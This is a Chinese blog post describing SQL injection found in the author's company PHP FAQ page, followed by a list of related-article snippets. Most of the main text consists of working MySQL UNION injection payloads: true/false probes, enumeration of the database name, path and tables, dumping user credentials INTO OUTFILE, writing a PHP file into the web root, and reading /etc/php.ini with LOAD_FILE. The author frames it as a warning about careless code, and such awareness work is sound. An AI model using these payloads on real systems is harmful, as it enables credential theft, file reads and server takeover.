sql注入公司的项目

最新推荐文章于 2024-08-05 15:32:37 发布
最新推荐文章于 2024-08-05 15:32:37 发布
阅读量673 收藏
点赞数
分类专栏: hacker linux 网络相关 mysql 服务器相关 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hello_simon/article/details/39270545
版权
php 同时被 3 个专栏收录
27 篇文章 1 订阅
订阅专栏
linux
18 篇文章 0 订阅
订阅专栏
服务器相关
12 篇文章 0 订阅
订阅专栏

这是在做公司的项目时发现的漏洞,公司代码管理方面有些欠缺,代码质量不是很好。

sql注入最严重的是被拿到服务器管理权限,删数据还是轻的了。写这个当然不是教你们怎么做黑客注入人家的网站,而是说明一个sql注入漏洞的危害,平时写代码要用心,不要应付。


代码里这样写:


正常的sql语句查出来的信息:



检查是否能注入:

第一步:http://192.168.18.142/xxxxxxx/faq/faq_display.php?cate_id=77’and ‘1’=’1&faq_user=800

第二步:这样说明有注入漏洞

http://192.168.18.142/xxxxxxxxxx/faq/faq_display.php?cate_id=77’  and ‘1’=’2&faq_user=800

猜查询多少字段,select1,2,3有值时说明原sql语句查询了3个字段,数据在2这个位置显示出来



爆数据库名

SELECT faq_id,faq_title,faq_cateid FROMfaq_info WHERE faq_cateid='77'

UNION SELECT 1,DATABASE(),3 FROMinformation_schema.TABLES WHERE '1'='1'


爆数据库路径

SELECT faq_id,faq_title,faq_cateid FROMfaq_info WHERE faq_cateid='77'

UNION SELECT 1,@@datadir,3 FROMinformation_schema.TABLES WHERE '1'='1'


爆所有表名

select faq_id,faq_title,faq_cateid from faq_info wherefaq_cateid='77' UNION SELECT 1,group_concat(table_name),3 FROMinformation_schema.TABLES where '1'='1'



爆用户名和密码



取得php.ini内容


看到这里应该想到sql注入的危害了吧,下面帖出一些sql注入相关的语句,危害大着呢

导出到文件里

SELECT faq_id,faq_title,faq_cateid FROMfaq_info WHERE faq_cateid='77'

UNION SELECT1,CONCAT(id,'|',username,'|',PASSWORD,'|',extension),3 INTO OUTFILE "/tmp/test.txt"FROM ss_ampusers WHERE '1'='1'

 

写入脚本

UNION SELECT 1,'<?php phpinfo();?>',3INTO OUTFILE "/data/justcall/html/userweb/a.php" FROM ss_ampusersWHERE '1'='1'

 

读文件

UNION SELECT 1,LOAD_FILE(‘/etc/php.ini’),3  FROM ss_ampusers WHERE '1'='1'

 

 

获取系统信息参数

SELECT faq_id,faq_title,faq_cateid FROMfaq_info WHERE faq_cateid='77'

UNION SELECT1,CONCAT(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,USER(),0x3c62723e,VERSION(),0x3c62723e,DATABASE()),3

FROM information_schema.TABLES WHERE'1'='1'

 

 

获取系统信息参数说明

@@global.version_compile_os获取系统版本

@@datadir 数据库路径
 database() 当前数据库名称
 0x3c62723e 换行HEX值

USER()用户和ip

VERSION()mysql版本

@@have_openssl如果mysqld支持客户端/服务器协议的SSL(加密)则为YES

 

@@version_compile_os判断系统类型

 

@@max_allowed_packet包或任何生成的/中间字符串的最大大小

 

@@max_user_connectionsMySQL账户允许的最大同时连接数,0表示没限制

 

@@skip_networking如果服务器只允许本地(非TCP/IP)连接,该值为ON

 

@@table_type 默认表类型(存储引擎)

 

@@basedirMySQL安装基准目录

 

@@character_set_database默认数据库使用的字符集

 

@@datadir 数据库存储的地方

 

@@expire_logs_days二进制日志自动删除的天数,默认是0,表示"没有自动删除"

 

@@group_concat_max_len允许group_concat()函数结果的最大长度

 

@@log_error 错误日志的位置

 

@@lower_case_file_system该变量说明是否数据目录所在的文件系统对文件名的大小写敏感.

 

ON说明对文件名的大小写不敏感,OFF表示敏感

 

@@lower_case_table_names如果设置为1,表名用小写保存到硬盘上,并且表名比较时不对大小写敏感.

 

如果设置为2,按照指定的保存表名,但按照小写来比较

 

@@plugin_dir 插件目录的路径

 

@@tmpdir 保存临时文件和临时表的目录

 

@@tmp_table_size如果内存内的临时表超过该值,MySQL自动将它转换为硬盘上的MyISAM表

 

@@sql_mode 当前服务器的sql模式

 

@@tx_isolation默认事务隔离级别。默认值为REPEATABLE-READ

 

@@Connections连接mysql数据库服务器的次数(不管成功还是失败)

 

@@max_write_lock_count最大写锁数量

 

@@old_passwords是否启用mysql323加密方式(就是mysql用户密码的hash是16位的)

 

@@Uptime 服务器已经运行的时间




hello_simon
关注
专栏目录
SQL注入项目报告(全英文)
10-09
这是我课程的项目报告,详细介绍了SQL注入漏洞的原理和手动检测方法,最后针对一种简单的SQL注入漏洞设计了一个自动检测漏洞的软件,该软件的基本架构是自己写的一个网络爬虫,希望对大家有帮助.软件的源代码过几天我也上传我的资源里面
ASP.NET防止SQL注入的方法示例
01-20
在ASP.NET开发SQL注入是一种常见的安全威胁,它允许攻击者通过输入恶意SQL语句来操纵数据库。本文将详细讲解如何使用实例方法防止ASP.NETSQL注入。 首先,了解SQL注入的基本概念。SQL注入是当应用程序直接...
项目开发安全问题及解决方案------sql注入
adru的博客
01-19 616
所谓盲注,指的是注入后并不能从服务器得到任何执行结果(甚至是错误信息),只能寄希望服务器对于 SQL 的真假条件表现出不同的状态。也就是说,通过在真假条件加入 SLEEP,来实现通过判断接口的响应时间,知道条件的结果是真还是假。基于时间的盲注原理就是,虽然 不能直接查询出 password 字段的值,但可以按字符逐一来查,判断第一个字符是否是 a、是否是 b……在代码,我们可以引入p6spy工具打印出所有执行的 SQL,观察 sqlmap 构造的一些 SQL,来分析 其原理。
SQL各种注入详解加案例--持续更新
最新发布
m0_72286569的博客
08-05 1028
在sql执行的时候,floor是向下取整,配合rand(0)*2产生的前五位数字一定是01101,这下就简单了,我们来模拟group_by过程,遍历 表第一行时,先计算出一个 x=0security,查临时表,不存在,再次计算 x 然后插入 x=1security;id=1”,这里的?时间盲注和布尔盲注的区别是,不管输入的数据正不正确只显示一个跳转页面,当然在注入的时候可以加一个sleep函数使得页面进行沉睡,当访问正确的时候,页面沉睡几秒后跳转,访问错误页面即可跳转。1,当输入Less-1/?
SQL注入-入门需了解项目
m0_63241485的博客
08-19 236
结构化查询语言(Structured Query Language,缩写:SQL),是一种特殊的编程语言,用于数据库的标准数据查询语言。1986年10月,美国国家标准学对SQL进行规范后,以此作为关系式数据库管理系统的标准语言(ANSI X3. 135-1986),1987年得到国际标准组织的支持下成为国际标准。不过各种通行的数据库系统在其实践过程都对SQL规范作了某些编改和扩充。所以,实际上不同数据库系统之间的SQL不能完全相互通用。提示:以下是本篇文章正文内容,下面文章可供参考。
SQL注入专题
ZY95001的博客
09-11 897
一、介绍 SQL注入漏洞在owasp top 10排名第一,是常见的web安全漏洞,攻击者利用漏洞,可以访问或修改数据,或者利用潜在的数据库漏洞进行攻击。该漏洞是由于:1.程序员在编程时处理程序和数据库交互时,使用字符串拼接的方式构造SQL语句。2.未对用户可控参数进行足够的过滤便将参数内容拼接进入到SQL语句。 注入点可能的位置:GET数据、POST数据、HTTP头部(referer、User-agent等)(HTTP请求报文其他字段)、cookie数据。最常用的是get、po...
我的第一个小项目上线啦&sql注入式攻击
周清城的博客
07-18 783
又到了晚上的玩耍时间,老板在工作室,就没敢看我的哈利波特第三集,但是玩还是要玩的, 今天看了一天的计算机图形学,补补我的计算机绘图基础,有点期末考一天复习完一科的赶脚 晚上刚好一个很厉害的师兄在这边,我也刚好买了自己的域名,云主机也早就运行好久了 知乎了一下,发现这两个东西组合在一起可以做出一些好玩的东西,那就是上线!!! 想想之前我之前做的小项目都是在本地的sql库
利用SQL注入漏洞登录后台的实现方法
12-15
SQL注入是一种常见的网络安全威胁,它发生在web应用程序未能充分验证或过滤用户输入的数据时。当攻击者成功利用SQL注入漏洞,他们可以构造恶意的SQL语句,以操纵数据库查询,获取敏感信息,甚至完全控制服务器。以下...
SpringBoot集成Mybatis实现简单的SQL注入(攻击)案例
12-14
(1)主演示就是一张t_user表,利用常见的用户登录来模拟sql注入对后台数据的侵入 (2)数据库脚本 — postgresql DROP TABLE IF EXISTS "public"."t_user"; CREATE TABLE "public"."t_user" ( "id" int8 NOT ...
使用Python防止SQL注入攻击的实现示例
09-16
开放式Web应用程序安全项目(OWASP)每几年都发布一次关于Web应用程序最常见安全风险的报告,其SQL注入攻击一直位居前列。SQL注入不仅常见,而且危害巨大,能够导致数据泄露、破坏或被篡改等严重后果。鉴于...
基于爬虫的sql注入漏洞检测工具
05-16
项目“基于爬虫的sql注入漏洞检测工具”旨在自动化检测这种漏洞,保护网站免受此类攻击。 首先,我们来深入理解SQL注入。当一个Web应用没有对用户输入进行充分的验证和清理,它可能在构建动态SQL查询时直接使用...
SQL注入攻击实验报告
05-07
SQL注入攻击实验报告,自己写了试验的网站,举了一些基本的攻击和防御方法,有xp_cmdshell的执行,用的是sqlserver 2005
物流搬家公司网站源码 v1.0
02-29
功能介绍: 一、基本管理 网站基本设置 管理员管理 信息显示设置 首页菜单管理 SMTP邮件配置 SQL注入设置 数据备份压缩 系统日志记录 二、单页管理(关于我们) 添加页面 管理页面 三、新闻管理 添加新闻 管理新闻 新闻分类管理 四、留言管理 五、广告管理 添加广告 管理广告 添加幻灯广告 管理幻灯广告 六、友情链接 添加友情链接 文字链接管理 图片链接管理 后台进入地址:/ebaitiancms/login.asp 后台帐号:ebaitiancms 后台密码:ebaitiancms
1+X 网络安全运营平台与管理 sql注入实验报告
路baby的博客
11-18 2237
项目化考核 1+X 证书(网络安全运营平台管理) sql注入实验报告 实验目的:实验设备 (环境)实验要求:实验原理:实验步骤:实验总结:
sql手动注入经验总结
qq_43337502的博客
09-11 5572
sql手动注入经验总结基本知识sql注入SQL盲注head注入dns漏洞注入 总结了一下sql几个注入的基本思路和用法,现来分享一下 基本知识 sql注入 如何判断有无注入: and1=2 步骤: 1、找注入点(id=1等等) 2、通过order by 找出一共有多少列数。(报错数字前一个)id=1 order by 3 (前面不用加and) 3、利用union select 1,2,3 (一般用null取代)到那个数字 显示哪个数字证明那个数字是输出点 id=1 union select 1,
mysql报错注入_项目实战 | 报错SQL注入绕过WAF
weixin_33560311的博客
01-01 275
文章来源:安译Sec报错的存在一个有趣的点:http://domain.com/xxx/news.php?id=xxx打开URL时,遇到了MySQL错误。Warning: mysql_fetch_assoc() expects parameter 1 to be resource, boolean give in … on line 27访问端点时出现MySQL错误我们知道可以执行一些基...
sql注入获取mysql信息_手把手教你通过SQL注入盗取数据库信息
weixin_33473110的博客
02-11 961
我们都是善良的银!一生戎码只为行侠仗义,知道这个不是为了做啥非法的事,只是知道小偷怎么偷东西才能更好地防范。SQL注入(SQL Injection),指将非法的SQL命令插入到URL或者Web表单请求,而这些请求被服务器认为是正常的SQL语句进行执行。下面我们用sqli-labs这个开源项目来演示一下SQL注入盗取信息的全程,我们不是为了sqli-labs是一个sql注入的练习靶机,项目地址为:...
Sql注入轻松获得管理员权限
weixin_34396902的博客
09-04 1206
检测可否注入 http://127.0.0.1/xx?id=11 and 1=1 (正常页面) http://127.0.0.1/xx?id=11 and 1=2 (出错页面) 检测表段的 http://127.0.0.1/xx?id=11 and exists (select * from admin) 检测字段的 http://127....
sql注入实战项目操作过程
10-21
SQL注入实战项目操作过程一般包括以下步骤: 1. 确定目标网站并进行信息收集,包括网站结构、数据库类型、网站漏洞等。 2. 使用工具或手动方式进行漏洞扫描,寻找可利用的SQL注入漏洞。 3. 利用找到的漏洞进行注入...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

hello_simon

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值